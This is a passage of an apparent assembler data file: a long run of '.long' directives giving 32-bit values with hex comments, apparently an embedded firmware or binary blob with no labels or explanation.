; 0x4003ba29 .long 2423701504 ; 0x9076c000 .long 3120566275 ; 0xba001003 .long 35667970 ; 0x2204002 .long 1493025280 ; 0x58fdc200 .long 3254780482 ; 0xc2000242 .long 3355335175 ; 0xc7fe5a07 .long 3355324156 ; 0xc7fe2efc .long 155069052 ; 0x93e2a7c .long 211730484 ; 0xc9ec034 .long 3221271617 ; 0xc000b441 .long 1552470690 ; 0x5c88d2a2 .long 1514717696 ; 0x5a48c200 .long 210944130 ; 0xc92c082 .long 687656958 ; 0x28fccffe .long 3030463170 ; 0xb4a132c2 .long 3229794304 ; 0xc082c000 .long 3030519062 ; 0xb4a20d16 .long 210288640 ; 0xc88c000 .long 3221271713 ; 0xc000b4a1 .long 3030519048 ; 0xb4a20d08 .long 210288640 ; 0xc88c000 .long 3221271713 ; 0xc000b4a1 .long 3030519048 ; 0xb4a20d08 .long 210288640 ; 0xc88c000 .long 3221271713 ; 0xc000b4a1 .long 3030519048 ; 0xb4a20d08 .long 210288640 ; 0xc88c000 .long 3221271713 ; 0xc000b4a1 .long 3030519048 ; 0xb4a20d08 .long 210288640 ; 0xc88c000 .long 3221271713 ; 0xc000b4a1 .long 3030519048 ; 0xb4a20d08 .long 210288640 ; 0xc88c000 .long 3221271713 ; 0xc000b4a1 .long 3030519048 ; 0xb4a20d08 .long 210288640 ; 0xc88c000 .long 3221271713 ; 0xc000b4a1 .long 3030519048 ; 0xb4a20d08 .long 3078668288 ; 0xb780c000 .long 3757851018 ; 0xdffc418a .long 3221257534 ; 0xc0007d3e .long 172659076 ; 0xa4a9184 .long 211730484 ; 0xc9ec034 .long 3221271681 ; 0xc000b481 .long 224051330 ; 0xd5ac082 .long 3022167673 ; 0xb4229e79 .long 3224682496 ; 0xc034c000 .long 3034647710 ; 0xb4e10c9e .long 3080699904 ; 0xb79fc000 .long 3082780270 ; 0xb7bf7e6e .long 3084877550 ; 0xb7df7eee .long 3086974830 ; 0xb7ff7f6e .long 3221389294 ; 0xc0027fee .long 2619509760 ; 0x9c228c00 .long 2097070108 ; 0x7cfec01c .long 3221266008 ; 0xc0009e58 .long 3490812900 ; 0xd01193e4 .long 1963334146 ; 0x75061a02 .long 2482290688 ; 0x93f4c000 .long 436916241 ; 0x1a0ad011 .long 3221255430 ; 0xc0007506 .long 3492188370 ; 0xd02690d2 .long 3221313796 ; 0xc0015904 .long 3492909344 ; 0xd0319120 .long 1964907010 ; 0x751e1a02 .long 2429730816 ; 0x90d2c000 .long 151048243 ; 0x900d033 .long 2415968257 ; 0x9000c001 .long 1510260736 ; 0x5a04c000 .long 423678035 ; 0x1940d053 .long 2470494208 ; 0x9340c000 .long 436391953 ; 0x1a02d011 .long 3221255430 ; 0xc0007506 .long 2233634994 ; 0x852290b2 .long 2453716992 ; 0x9240c000 .long 436916241 ; 0x1a0ad011 .long 3221255462 ; 0xc0007526 .long 3492909426 ; 0xd0319172 .long 3254782474 ; 0xc2000a0a .long 37902589 ; 0x24258fd .long 1493684774 ; 0x5907d226 .long 2424356864 ; 0x9080c000 .long 420270099 ; 0x190cd013 .long 2619514179 ; 0x9c229d43 .long 1435285376 ; 0x558cb780 .long 2827153928 ; 0xa882f208 .long 338874384 ; 0x1432d010 .long 3221255229 ; 0xc000743d .long 142315702 ; 0x87b90b6 .long 2430648320 ; 0x90e0c000 .long 2232054790 ; 0x850a7406 .long 1148760834 ; 0x4478b302 .long 4060650819 ; 0xf2089d43 .long 3792742659 ; 0xe210a903 .long 168460321 ; 0xa0a8021 .long 3222407422 ; 0xc01208fe .long 3222302728 ; 0xc0107008 .long 2619502594 ; 0x9c227002 .long 1419032352 ; 0x5494b720 .long 3072361730 ; 0xb7208502 .long 3624944075 ; 0xd81041cb .long 3624968575 ; 0xd810a17f .long 2231542131 ; 0x8502a173 .long 1435285376 ; 0x558cb780 .long 2707943440 ; 0xa167f010 .long 2709248016 ; 0xa17bd810 .long 2708985872 ; 0xa177d810 .long 2707937360 ; 0xa167d850 .long 2709254160 ; 0xa17bf010 .long 2708461648 ; 0xa16fd850 .long 2708199504 ; 0xa16bd850 .long 2707675216 ; 0xa163d850 .long 2707943504 ; 0xa167f050 .long 2707681360 ; 0xa163f050 .long 2709516304 ; 0xa17ff010 .long 2708467792 ; 0xa16ff050 .long 2708205648 ; 0xa16bf050 .long 2699161616 ; 0xa0e1f010 .long 2703219208 ; 0xa11fda08 .long 2702432776 ; 0xa113da08 .long 2701652488 ; 0xa107f208 .long 2702957064 ; 0xa11bda08 .long 2702694920 ; 0xa117da08 .long 2701646408 ; 0xa107da48 .long 2702963208 ; 0xa11bf208 .long 2702170696 ; 0xa10fda48 .long 2701908552 ; 0xa10bda48 .long 2701384264 ; 0xa103da48 .long 2701652552 ; 0xa107f248 .long 1103869728 ; 0x41cbb720 .long 2701390408 ; 0xa103f248 .long 2703225352 ; 0xa11ff208 .long 2702176840 ; 0xa10ff248 .long 2692870664 ; 0xa081f208 .long 2701914696 ; 0xa10bf248 .long 3078659106 ; 0xb7809c22 .long 4027602316 ; 0xf010558c .long 4060653793 ; 0xf208a8e1 .long 3624968321 ; 0xd810a081 .long 3658000626 ; 0xda08a8f2 .long 3629162642 ; 0xd850a092 .long 3662194917 ; 0xda48a8e5 .long 4031815813 ; 0xf050a085 .long 4064848102 ; 0xf248a8e6 .long 4031815814 ; 0xf050a086 .long 4064848097 ; 0xf248a8e1 .long 3624968321 ; 0xd810a081 .long 3658000638 ; 0xda08a8fe .long 4027621534 ; 0xf010a09e .long 4060653817 ; 0xf208a8f9 .long 4027621529 ; 0xf010a099 .long 4060653798 ; 0xf208a8e6 .long 3629162630 ; 0xd850a086 .long 3662194913 ; 0xda48a8e1 .long 3624968321 ; 0xd810a081 .long 3658000634 ; 0xda08a8fa .long 3629162650 ; 0xd850a09a .long 3662194925 ; 0xda48a8ed .long 3624968333 ; 0xd810a08d .long 3658000630 ; 0xda08a8f6 .long 3629162646 ; 0xd850a096 .long 3662194921 ; 0xda48a8e9 .long 4031815817 ; 0xf050a089 .long 4064848110 ; 0xf248a8ee .long 4027621518 ; 0xf010a08e .long 3072370941 ; 0xb720a8fd .long 4060632724 ; 0xf2085694 .long 3074465949 ; 0xb740a09d .long 4031791581 ; 0xf05041dd .long 3271666281 ; 0xc301aa69 .long 3040903456 ; 0xb5408120 .long 4031791581 ; 0xf05041dd .long 4077955681 ; 0xf310aa61 .long 2231535649 ; 0x85028821 .long 1087223168 ; 0x40cdb580 .long 2708723728 ; 0xa173d810 .long 134382850 ; 0x8028502 .long 2707943440 ; 0xa167f010 .long 2709248016 ; 0xa17bd810 .long 2708985872 ; 0xa177d810 .long 2707937360 ; 0xa167d850 .long 2709254160 ; 0xa17bf010 .long 2708461648 ; 0xa16fd850 .long 2708199504 ; 0xa16bd850 .long 2708205648 ; 0xa16bf050 .long 1958911010 ; 0x74c29c22 .long 3221331548 ; 0xc0019e5c .long 3078656452 ; 0xb78091c4 .long 3523762444 ; 0xd208590c .long 1950394501 ; 0x7440a885 .long 3041035522 ; 0xb5428502 .long 3221311512 ; 0xc0015018 .long 3078656420 ; 0xb78091a4 .long 3072349580 ; 0xb720558c .long 3662173076 ; 0xda485394 .long 3074467969 ; 0xb740a881 .long 3078636237 ; 0xb78042cd .long 3074446476 ; 0xb740548c .long 1620399764 ; 0x60955694 .long 2836918856 ; 0xa917f248 .long 2840457232 ; 0xa94df010 .long 1153808192 ; 0x44c5b740 .long 1145943936 ; 0x444db780 .long 2166669825 ; 0x8124c201 .long 2292441616 ; 0x88a3e210 .long 2317480720 ; 0x8a21f310 .long 3221254216 ; 0xc0007048 .long 3043135996 ; 0xb56291fc .long 3221245960 ; 0xc0005008 .long 1958777184 ; 0x74c09160 .long 2433007616 ; 0x9104c000 .long 1418508064 ; 0x548cb720 .long 2852248072 ; 0xaa01da08 .long 1101772160 ; 0x41abb580 .long 1342748418 ; 0x5008b702 .long 2786958370 ; 0xa61d9c22 .long 3124432514 ; 0xba3b0e82 .long 3423748098 ; 0xcc124002 .long 2662888138 ; 0x9eb872ca .long 2660671062 ; 0x9e969e56 .long 313288369 ; 0x12ac66b1 .long 3120657728 ; 0xba017540 .long 3221241859 ; 0xc0004003 .long 93033276 ; 0x58b933c .long 218235275 ; 0xd02018b .long 2614804532 ; 0x9bdac034 .long 1577833250 ; 0x5e0bd322 .long 2659545416 ; 0x9e857148 .long 2468003840 ; 0x931ac000 .long 1502663460 ; 0x5990d324 .long 218235374 ; 0xd0201ee .long 2614018100 ; 0x9bcec034 .long 1614913132 ; 0x60419e6c .long 1519636516 ; 0x5a93d024 .long 2441134080 ; 0x9180c000 .long 1401730944 ; 0x538cb780 .long 2827672072 ; 0xa88ada08 .long 361811984 ; 0x1590d010 .long 3224636674 ; 0xc0340d02 .long 2659556287 ; 0x9e859bbf .long 3080691304 ; 0xb79f9e68 .long 3082780270 ; 0xb7bf7e6e .long 3084877550 ; 0xb7df7eee .long 3086974830 ; 0xb7ff7f6e .long 3221389294 ; 0xc0027fee .long 2619509760 ; 0x9c228c00 .long 2218829341 ; 0x8440a61d .long 1402255328 ; 0x5394b7e0 .long 2859850256 ; 0xaa75da10 .long 1418508256 ; 0x548cb7e0 .long 3074454842 ; 0xb740753a .long 4060632460 ; 0xf208558c .long 209889889 ; 0xc82aa61 .long 210948106 ; 0xc92d00a .long 2121577791 ; 0x7e74b53f .long 3624432900 ; 0xd8087504 .long 3628640861 ; 0xd848aa5d .long 3047139521 ; 0xb59fa8c1 .long 4027088620 ; 0xf0087eec .long 2660083934 ; 0x9e8da8de .long 3123514114 ; 0xba2d0b02 .long 3040821251 ; 0xb53f4003 .long 3221323636 ; 0xc0017f74 .long 3082850980 ; 0xb7c092a4 .long 4061157012 ; 0xf2105694 .long 4061178187 ; 0xf210a94b .long 2000726605 ; 0x7740aa4d .long 2292314896 ; 0x88a1f310 .long 2451357696 ; 0x921cc000 .long 2848387144 ; 0xa9c6f048 .long 218275435 ; 0xd029e6b .long 2608775220 ; 0x9b7ec034 .long 2842417680 ; 0xa96bda10 .long 2284581648 ; 0x882bf310 .long 315645961 ; 0x12d06009 .long 1900860434 ; 0x714cd412 .long 2859069960 ; 0xaa69f208 .long 3080680706 ; 0xb79f7502 .long 142769772 ; 0x8827e6c .long 143839241 ; 0x892d009 .long 3221321800 ; 0xc0017848 .long 3078591394 ; 0xb77f93a2 .long 3074391402 ; 0xb73f7d6a .long 2662039412 ; 0x9eab7f74 .long 2840195664 ; 0xa949f250 .long 1073920539 ; 0x4002ba1b .long 76219651 ; 0x48b0503 .long 2607939572 ; 0x9b71fff4 .long 2462105601 ; 0x92c0c001 .long 1452586784 ; 0x5694b720 .long 1079883584 ; 0x405db740 .long 1104000896 ; 0x41cdb780 .long 4077942592 ; 0xf3107740 .long 3221260449 ; 0xc00088a1 .long 3658518876 ; 0xda10915c .long 3078662507 ; 0xb780a96b .long 3809494605 ; 0xe310464d .long 1648593067 ; 0x624388ab .long 4060615384 ; 0xf20812d8 .long 1963108969 ; 0x7502aa69 .long 2431827968 ; 0x90f2c000 .long 2859063816 ; 0xaa69da08 .long 3221255424 ; 0xc0007500 .long 3074462242 ; 0xb7409222 .long 3078571469 ; 0xb77f45cd .long 3074391402 ; 0xb73f7d6a .long 2662039412 ; 0x9eab7f74 .long 1073920539 ; 0x4002ba1b .long 76219651 ; 0x48b0503 .long 2605055988 ; 0x9b45fff4 .long 2436939776 ; 0x9140c000 .long 2842417680 ; 0xa96bda10 .long 3809517227 ; 0xe3109eab .long 218270123 ; 0xd0289ab .long 2603139124 ; 0x9b28c034 .long 134349569 ; 0x8020301 .long 1904263186 ; 0x7180c012 .long 2104407967 ; 0x7d6eb79f .long 2112796607 ; 0x7deeb7bf .long 2121185247 ; 0x7e6eb7df .long 2129573887 ; 0x7eeeb7ff .long 2353053698 ; 0x8c40c002 .long 2785385506 ; 0xa6059c22 .long 1661253440 ; 0x6304b740 .long 1073986066 ; 0x4003ba12 .long 505597969 ; 0x1e22d011 .long 1493488166 ; 0x5904d226 .long 3358629421 ; 0xc8309e2d .long 3121850573 ; 0xba13a8cd .long 2656780290 ; 0x9e5b4002 .long 1779879953 ; 0x6a16d011 .long 2655875208 ; 0x9e4d7088 .long 2432483329 ; 0x90fcc001 .long 3221255360 ; 0xc00074c0 .long 3246428700 ; 0xc180921c .long 3491781127 ; 0xd0205a07 .long 218235304 ; 0xd0201a8 .long 2600124468 ; 0x9afac034 .long 2854613512 ; 0xaa25f208 .long 3525599809 ; 0xd2246241 .long 3221248323 ; 0xc0005943 .long 3490812128 ; 0xd01190e0 .long 2661420578 ; 0x9ea20e22 .long 1073986066 ; 0x4003ba12 .long 1452062496 ; 0x568cb720 .long 168874129 ; 0xa10d091 .long 2827145736 ; 0xa882d208 .long 3004330626 ; 0xb3127282 .long 3221243994 ; 0xc000485a .long 3072364762 ; 0xb72090da .long 3356643249 ; 0xc8124fb1 .long 2656072322 ; 0x9e507282 .long 2137962399 ; 0x7f6eb79f .long 2146351039 ; 0x7feeb7bf .long 2619509824 ; 0x9c228c40 .long 3072370181 ; 0xb720a605 .long 3072349332 ; 0xb7205494 .long 3070246989 ; 0xb700404d .long 1950635924 ; 0x74445794 .long 503369809 ; 0x1e00d051 .long 1145221952 ; 0x4442b340 .long 3072368205 ; 0xb7209e4d .long 2656846794 ; 0x9e5c43ca .long 1073986066 ; 0x4003ba12 .long 2088689660 ; 0x7c7edffc .long 1073920539 ; 0x4002ba1b .long 1073920530 ; 0x4002ba12 .long 2432876544 ; 0x9102c000 .long 4294182017 ; 0xfff40481 .long 2659359652 ; 0x9e829ba4 .long 1073986066 ; 0x4003ba12 .long 2854605448 ; 0xaa25d288 .long 3221255426 ; 0xc0007502 .long 3078656452 ; 0xb78091c4 .long 3523761164 ; 0xd208540c .long 1950394497 ; 0x7440a881 .long 2430910464 ; 0x90e4c000 .long 237293585 ; 0xe24d011 .long 3121782434 ; 0xba129ea2 .long 3532144643 ; 0xd2884003 .long 1963108905 ; 0x7502aa29 .long 2430910464 ; 0x90e4c000 .long 237162513 ; 0xe22d011 .long 3121782434 ; 0xba129ea2 .long 3662168067 ; 0xda484003 .long 2656217657 ; 0x9e52aa39 .long 147378193 ; 0x8c8d011 .long 3221254274 ; 0xc0007082 .long 2659881212 ; 0x9e8a90fc .long 1073986066 ; 0x4003ba12 .long 2436939776 ; 0x9140c000 .long 437296721 ; 0x1a109e51 .long 3122950216 ; 0xba247048 .long 3005497346 ; 0xb3244002 .long 2661435446 ; 0x9ea24836 .long 1452062496 ; 0x568cb720 .long 1328134016 ; 0x4f29b780 .long 304651858 ; 0x12289e52 .long 3121782434 ; 0xba129ea2 .long 1988378627 ; 0x76844003 .long 3221266057 ; 0xc0009e89 .long 218796220 ; 0xd0a90bc .long 2430648320 ; 0x90e0c000 .long 2239461051 ; 0x857b76bb .long 1216000802 ; 0x487ab322 .long 3074465227 ; 0xb7409dcb .long 3792719705 ; 0xe2104f59 .long 3499196589 ; 0xd09180ad .long 2659847696 ; 0x9e8a0e10 .long 2852246024 ; 0xaa01d208 .long 1073986066 ; 0x4003ba12 .long 1883807313 ; 0x70489e51 .long 1146794818 ; 0x445ab342 .long 2432352256 ; 0x90fac000 .long 1338619776 ; 0x4fc9b780 .long 3356663457 ; 0xc8129ea1 .long 2656072322 ; 0x9e507282 .long 2137962399 ; 0x7f6eb79f .long 2146351039 ; 0x7feeb7bf .long 2619509824 ; 0x9c228c40 .long 3757876765 ; 0xdffca61d .long 3221257982 ; 0xc0007efe .long 3078656516 ; 0xb7809204 .long 3082835340 ; 0xb7c0558c .long 3657979796 ; 0xda085794 .long 3658001049 ; 0xda08aa99 .long 4060654353 ; 0xf208ab11 .long 3658001030 ; 0xda08aa86 .long 3221269397 ; 0xc000ab95 .long 3078656448 ; 0xb78091c0 .long 3082835340 ; 0xb7c0558c .long 3662173972 ; 0xda485714 .long 3662195341 ; 0xda48aa8d .long 4060654341 ; 0xf208ab05 .long 3662195354 ; 0xda48aa9a .long 3221793673 ; 0xc008ab89 .long 3221255488 ; 0xc0007540 .long 2662044124 ; 0x9eab91dc .long 2589638708 ; 0x9a5ac034 .long 3254820481 ; 0xc2009e81 .long 3254801059 ; 0xc20052a3 .long 3254801219 ; 0xc2005343 .long 3254801379 ; 0xc20053e3 .long 3074447015 ; 0xb74056a7 .long 3534119172 ; 0xd2a66104 .long 2653772036 ; 0x9e2d5904 .long 2832058416 ; 0xa8cdc830 .long 2857490960 ; 0xaa51da10 .long 1676895075 ; 0x63f36363 .long 1637660480 ; 0x619cb740 .long 3658484228 ; 0xda100a04 .long 2659820113 ; 0x9e89a251 .long 3658521927 ; 0xda109d47 .long 3255872085 ; 0xc210aa55 .long 1725147429 ; 0x66d3a925 .long 4077946222 ; 0xf310856e .long 2660337697 ; 0x9e918821 .long 1073920556 ; 0x4002ba2c .long 1453834752 ; 0x56a7c200 .long 2001256460 ; 0x7748c00c .long 1397473792 ; 0x534bc200 .long 1407959552 ; 0x53ebc200 .long 2457649153 ; 0x927cc001 .long 1971372288 ; 0x7580c100 .long 3229523563 ; 0xc07e9e6b .long 3009677950 ; 0xb3640a7e .long 3525723192 ; 0xd2264438 .long 3263189268 ; 0xc2805114 .long 3793771911 ; 0xe2205d87 .long 218268079 ; 0xd0281af .long 2582691892 ; 0x99f0c034 .long 2839802384 ; 0xa943f210 .long 1636749362 ; 0x618ed032 .long 2849102352 ; 0xa9d1da10 .long 2175787552 ; 0x81afe220 .long 3122334978 ; 0xba1b0d02 .long 4061151234 ; 0xf2104002 .long 3224674754 ; 0xc034a1c2 .long 1969134049 ; 0x755e99e1 .long 2688938512 ; 0xa045f210 .long 441503821 ; 0x1a50d04d .long 1377030170 ; 0x5213d01a .long 2430255104 ; 0x90dac000 .long 4077946178 ; 0xf3108542 .long 1376815139 ; 0x52108823 .long 2722492944 ; 0xa245f210 .long 3658515718 ; 0xda108506 .long 3080692063 ; 0xb79fa15f .long 3082780270 ; 0xb7bf7e6e .long 3084877550 ; 0xb7df7eee .long 3086974830 ; 0xb7ff7f6e .long 3221389294 ; 0xc0027fee .long 2619509760 ; 0x9c228c00 .long 1992467981 ; 0x76c2a60d .long 1402255264 ; 0x5394b7a0 .long 2460270593 ; 0x92a4c001 .long 1435285408 ; 0x558cb7a0 .long 2855131720 ; 0xaa2dda48 .long 3221255424 ; 0xc0007500 .long 226922658 ; 0xd8690a2 .long 2606825460 ; 0x9b60fff4 .long 2855918088 ; 0xaa39da08 .long 3221255424 ; 0xc0007500 .long 226660514 ; 0xd8290a2 .long 2606301172 ; 0x9b58fff4 .long 2829179464 ; 0xa8a1da48 .long 2854869520 ; 0xaa29da10 .long 3221254216 ; 0xc0007048 .long 3657995138 ; 0xda089382 .long 4294224701 ; 0xfff4ab3d .long 3078658545 ; 0xb78099f1 .long 4060632204 ; 0xf208548c .long 3524307073 ; 0xd210a881 .long 3072371361 ; 0xb720aaa1 .long 1950504596 ; 0x74425694 .long 1330230688 ; 0x4f49b5a0 .long 2661981827 ; 0x9eaa9e83 .long 1073920542 ; 0x4002ba1e .long 4294183190 ; 0xfff40916 .long 3120601785 ; 0xba009ab9 .long 3524280322 ; 0xd2104002 .long 3524304929 ; 0xd210a021 .long 3080693793 ; 0xb79fa821 .long 3082780398 ; 0xb7bf7eee .long 3084877678 ; 0xb7df7f6e .long 2355134446 ; 0x8c607fee .long 2619513890 ; 0x9c229c22 .long 1073920539 ; 0x4002ba1b .long 1485296036 ; 0x5887d1a4 .long 2655559258 ; 0x9e489e5a .long 1377831046 ; 0x52200886 .long 1887967748 ; 0x70881a04 .long 2424094721 ; 0x907cc001 .long 134389324 ; 0x8029e4c .long 3490803720 ; 0xd0117008 .long 1353718322 ; 0x50b01a32 .long 2446770176 ; 0x91d6c000 .long 3221256260 ; 0xc0007844 .long 3490812324 ; 0xd01191a4 .long 3120826882 ; 0xba040a02 .long 2655797250 ; 0x9e4c4002 .long 1485271048 ; 0x58877008 .long 2463694847 ; 0x92d8ffff .long 2619475970 ; 0x9c220802 .long 3120566320 ; 0xba001030 .long 2619490306 ; 0x9c224002 .long 1493684646 ; 0x5907d1a6 .long 2283921936 ; 0x8821e210 .long 1073920512 ; 0x4002ba00 .long 3490815010 ; 0xd0119c22 .long 134356498 ; 0x8021e12 .long 1353740296 ; 0x50b07008 .long 2448867328 ; 0x91f6c000 .long 2017762977 ; 0x78449ea1 .long 2449801215 ; 0x9204ffff .long 167956497 ; 0xa02d011 .long 1073920516 ; 0x4002ba04 .long 1879613004 ; 0x70089e4c .long 4294924423 ; 0xffff5887 .long 134648536 ; 0x80692d8 .long 3078659106 ; 0xb7809c22 .long 4064826508 ; 0xf248548c .long 2660804887 ; 0x9e98a917 .long 3793753520 ; 0xe22015b0 .long 4064838063 ; 0xf24881af .long 3490750870 ; 0xd010a196 .long 1983948994 ; 0x7640a8c2 .long 3221555586 ; 0xc0050982 .long 2231800420 ; 0x85069264 .long 2706100240 ; 0xa14bd010 .long 2852254216 ; 0xaa01f208 .long 3490739458 ; 0xd0107502 .long 3221362096 ; 0xc00215b0 .long 3072365252 ; 0xb72092c4 .long 3074446220 ; 0xb740538c .long 3508945837 ; 0xd12643ad .long 4061157648 ; 0xf2105910 .long 3254814757 ; 0xc2008825 .long 1892178451 ; 0x70c85a13 .long 3070271115 ; 0xb7009e8b .long 3221509780 ; 0xc0045694 .long 4031812022 ; 0xf05091b6 .long 1892199013 ; 0x70c8aa65 .long 2440609792 ; 0x9178c000 .long 1321776928 ; 0x4ec8b720 .long 706663409 ; 0x2a1ed3f1 .long 3221452038 ; 0xc0037506 .long 3221459572 ; 0xc0039274 .long 3492909792 ; 0xd03192e0 .long 3254807081 ; 0xc2006a29 .long 1892178451 ; 0x70c85a13 .long 2440609792 ; 0x9178c000 .long 1321776928 ; 0x4ec8b720 .long 706663409 ; 0x2a1ed3f1 .long 3221452036 ; 0xc0037504 .long 3221459060 ; 0xc0039074 .long 3492909280 ; 0xd03190e0 .long 3254807079 ; 0xc2006a27 .long 1892178451 ; 0x70c85a13 .long 2440609792 ; 0x9178c000 .long 1321776928 ; 0x4ec8b720 .long 706663409 ; 0x2a1ed3f1 .long 3221386498 ; 0xc0027502 .long 3221394036 ; 0xc0029274 .long 3490812640 ; 0xd01192e0 .long 3254807085 ; 0xc2006a2d .long 1892178451 ; 0x70c85a13 .long 2463678466 ; 0x92d8c002 .long 213176497 ; 0xcb4d0b1 .long 1314436928 ; 0x4e58b740 .long 1076475776 ; 0x4029b780 .long 1321776928 ; 0x4ec8b720 .long 2149708560 ; 0x8021f310 .long 3221319752 ; 0xc0017048 .long 3221394360 ; 0xc00293b8 .long 3072364576 ; 0xb7209020 .long 3074446220 ; 0xb740538c .long 3508945837 ; 0xd12643ad .long 4061157648 ; 0xf2105910 .long 3254814757 ; 0xc2008825 .long 1892178451 ; 0x70c85a13 .long 3070271115 ; 0xb7009e8b .long 3221313172 ; 0xc0015694 .long 4031812406 ; 0xf0509336 .long 1892199013 ; 0x70c8aa65 .long 2446786558 ; 0x91d6fffe .long 1780994097 ; 0x6a27d031 .long 1511244288 ; 0x5a13c200 .long 3221254344 ; 0xc00070c8 .long 3078656440 ; 0xb78091b8 .long 3223080648 ; 0xc01c4ec8 .long 3221257534 ; 0xc0007d3e .long 168072164 ; 0xa0493e4 .long 1321776512 ; 0x4ec8b580 .long 2420162561 ; 0x9040c001 .long 1510457600 ; 0x5a07c100 .long 3221254344 ; 0xc00070c8 .long 3501298552 ; 0xd0b19378 .long 3074428084 ; 0xb7400cb4 .long 3078639192 ; 0xb7804e58 .long 3072344105 ; 0xb7204029 .long 4077932232 ; 0xf3104ec8 .long 1883799585 ; 0x70488021 .long 2434187264 ; 0x9116c000 .long 169005073 ; 0xa12d011 .long 1321776512 ; 0x4ec8b580 .long 2436939776 ; 0x9140c000 .long 2697646096 ; 0xa0cad010 .long 1322300704 ; 0x4ed0b520 .long 2424356864 ; 0x9080c000 .long 2697646096 ; 0xa0cad010 .long 2859849744 ; 0xaa75d810 .long 1112323872 ; 0x424cb720 .long 1883773444 ; 0x70481a04 .long 1218753344 ; 0x48a4b340 .long 3490743554 ; 0xd0108502 .long 2619515211 ; 0x9c22a14b .long 2714357776 ; 0xa1c9d010 .long 3222182946 ; 0xc00e9c22 .long 3543215612 ; 0xd3312dfc .long 3490802875 ; 0xd0116cbb .long 1486954038 ; 0x58a11e36 .long 3122950216 ; 0xba247048 .long 3004448770 ; 0xb3144002 .long 8995900 ; 0x89443c .long 1577374114 ; 0x5e04d1a2 .long 2265609282 ; 0x870a7442 .long 3004304780 ; 0xb3120d8c .long 2656650394 ; 0x9e59449a .long 1896009746 ; 0x7102d012 .long 1962983428 ; 0x7500c004 .long 1452586784 ; 0x5694b720 .long 3007481214 ; 0xb342857e .long 3040887928 ; 0xb5404478 .long 3221376961 ; 0xc0024fc1 .long 3040873600 ; 0xb5400c80 .long 2619490393 ; 0x9c224059 .long 3224413701 ; 0xc030a605 .long 3080760445 ; 0xb7a0ac7d .long 2639877004 ; 0x9d59538c .long 2757607480 ; 0xa45dc038 .long 2893922352 ; 0xac7dc030 .long 2757607480 ; 0xa45dc038 .long 2893922352 ; 0xac7dc030 .long 2757607480 ; 0xa45dc038 .long 3221360002 ; 0xc0020d82 .long 4294183298 ; 0xfff40982 .long 3757873857 ; 0xdffc9ac1 .long 3657989182 ; 0xda087c3e .long 167946666 ; 0xa02a9aa .long 172150786 ; 0xa42d002 .long 1494005536 ; 0x590cb720 .long 3221359034 ; 0xc00209ba .long 2231765676 ; 0x85060aac .long 2720125448 ; 0xa221d208 .long 1085912384 ; 0x40b9b540 .long 2595160052 ; 0x9aaefff4 .long 1452586784 ; 0x5694b720 .long 236245297 ; 0xe14d131 .long 211079537 ; 0xc94d171 .long 219992369 ; 0xd1cd131 .long 2684475912 ; 0xa001da08 .long 236769649 ; 0xe1cd171 .long 3036710146 ; 0xb5008502 .long 3624419371 ; 0xd808402b .long 3221332291 ; 0xc001a143 .long 3657959558 ; 0xda080886 .long 3038814467 ; 0xb520a103 .long 3080669389 ; 0xb79f48cd .long 3082780526 ; 0xb7bf7f6e .long 2353037294 ; 0x8c407fee .long 3072367650 ; 0xb7209c22 .long 3078640780 ; 0xb780548c .long 2231517485 ; 0x8502412d .long 1094432064 ; 0x413bb540 .long 3045067268 ; 0xb5800a04 .long 2619490605 ; 0x9c22412d .long 3072370205 ; 0xb720a61d .long 3078641292 ; 0xb780568c .long 2660057645 ; 0x9e8d422d .long 1401731008 ; 0x538cb7c0 .long 168064708 ; 0xa0476c4 .long 1110291840 ; 0x422db580 .long 2435104768 ; 0x9124c000 .long 4061168898 ; 0xf2108502 .long 3657998643 ; 0xda08a133 .long 4061178453 ; 0xf210aa55 .long 3078660661 ; 0xb780a235 .long 1992578188 ; 0x76c4548c .long 4060651174 ; 0xf2089ea6 .long 3221856642 ; 0xc009a182 .long 3657994532 ; 0xda089124 .long 3074468182 ; 0xb740a956 .long 2231523724 ; 0x8502598c .long 2704528080 ; 0xa133d2d0 .long 2706100880 ; 0xa14bd290 .long 2857234952 ; 0xaa4df208 .long 2840064008 ; 0xa947f008 .long 2149708560 ; 0x8021f310 .long 3525574793 ; 0xd2240089 .long 4161296639 ; 0xf80858ff .long 4064846033 ; 0xf248a0d1 .long 4077955653 ; 0xf310aa45 .long 9011233 ; 0x898021 .long 1493160484 ; 0x58ffd224 .long 2697590792 ; 0xa0c9f808 .long 2697852936 ; 0xa0cdf808 .long 2832069192 ; 0xa8cdf248 .long 2158223904 ; 0x80a3e220 .long 219192907 ; 0xd109e4b .long 1510457472 ; 0x5a07c080 .long 59076808 ; 0x38570c8 .long 2697392136 ; 0xa0c6f008 .long 2455158784 ; 0x9256c000 .long 1493749926 ; 0x5908d0a6 .long 2149839376 ; 0x8023f210 .long 1511244288 ; 0x5a13c200 .long 2231791816 ; 0x850670c8 .long 2706100880 ; 0xa14bd290 .long 2429992960 ; 0x90d6c000 .long 2704528080 ; 0xa133d2d0 .long 2724590088 ; 0xa265f208 .long 2850484744 ; 0xa9e6f208 .long 218275411 ; 0xd029e53 .long 2611265556 ; 0x9ba4c014 .long 2856972816 ; 0xaa49f210 .long 4065359106 ; 0xf2507502 .long 3221332021 ; 0xc001a035 .long 3501298420 ; 0xd0b192f4 .long 3523742436 ; 0xd2080ae4 .long 1962977825 ; 0x7500aa21 .long 2449653761 ; 0x9202c001 .long 2856966672 ; 0xaa49da10 .long 1514201600 ; 0x5a40e200 .long 2455945216 ; 0x9262c000 .long 2841631312 ; 0xa95fda50 .long 1514521088 ; 0x5a45c200 .long 2149708560 ; 0x8021f310 .long 2848578064 ; 0xa9c9da10 .long 2724059728 ; 0xa25dda50 .long 2849954384 ; 0xa9deda50 .long 3222539522 ; 0xc0140d02 .long 3662715777 ; 0xda509b81 .long 3662717021 ; 0xda50a05d .long 1966123613 ; 0x7530aa5d .long 2459090944 ; 0x9292c000 .long 2857235016 ; 0xaa4df248 .long 1494012454 ; 0x590cd226 .long 2833641992 ; 0xa8e5f208 .long 2283926288 ; 0x8821f310 .long 1510982144 ; 0x5a0fc200 .long 3221254216 ; 0xc0007048 .long 3523776764 ; 0xd20890fc .long 436513313 ; 0x1a04aa21 .long 2720125448 ; 0xa221d208 .long 2855662160 ; 0xaa35f250 .long 2833641992 ; 0xa8e5f208 .long 3662710018 ; 0xda508502 .long 3525747039 ; 0xd226a15f .long 1950374152 ; 0x74405908 .long 2149708560 ; 0x8021f310 .long 2720657936 ; 0xa229f210 .long 2427895808 ; 0x90b6c000 .long 4061168898 ; 0xf2108502 .long 4060651819 ; 0xf208a12b .long 4061178457 ; 0xf210aa59 .long 3221399721 ; 0xc002a8a9 .long 3254807118 ; 